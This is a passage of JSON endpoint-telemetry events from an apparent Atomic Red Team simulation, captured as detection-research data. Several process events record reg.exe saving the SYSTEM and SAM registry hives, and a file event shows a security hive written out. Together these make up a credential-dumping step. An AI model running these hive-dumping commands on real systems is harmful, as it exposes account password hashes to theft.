"timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", 
- "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.ApplicationModel.Background.SystemEventsBroker.dll", - "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.SystemEventsBroker.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "process", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "subtype": "terminate", - "timestamp": 131883571692460000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_value": "HostActivityManager", - "timestamp": 131883571692460000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows 
NT\\CurrentVersion\\HostActivityManager\\Volatile", - "registry_value": "Volatile", - "timestamp": 131883571692460000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571749180000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571749180000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571749180000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "file", - "file_name": "REGC0BC.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "file", - "file_name": "REGC0BC.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", - "pid": 6700, - "process_name": "reg.exe", - 
"process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "file", - "file_name": "security.hive", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\security.hive", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "process", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "process", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\System system.hive\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3020, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - 
"subtype": "create", - "timestamp": 131883571775030000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "command_line": "reg save HKLM\\System system.hive", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 2008, - "ppid": 3020, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571775150000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}", - "unique_ppid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - 
"image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883571800270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - 
"timestamp": 131883571800270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "file", - "file_name": "REGCD01.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571806210000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "file", - "file_name": "REGCD01.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571806210000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "file", - "file_name": "system.hive", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\system.hive", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571807140000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807140000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807140000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "process", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "process", - "pid": 3020, - "process_name": 
"cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3544, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571807430000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - 
"timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "command_line": "reg save HKLM\\SAM sam.hive", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2160, - "ppid": 3544, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571807530000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}", - "unique_ppid": "{42FC7E13-CB3C-5C05-0000-001099025101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": 
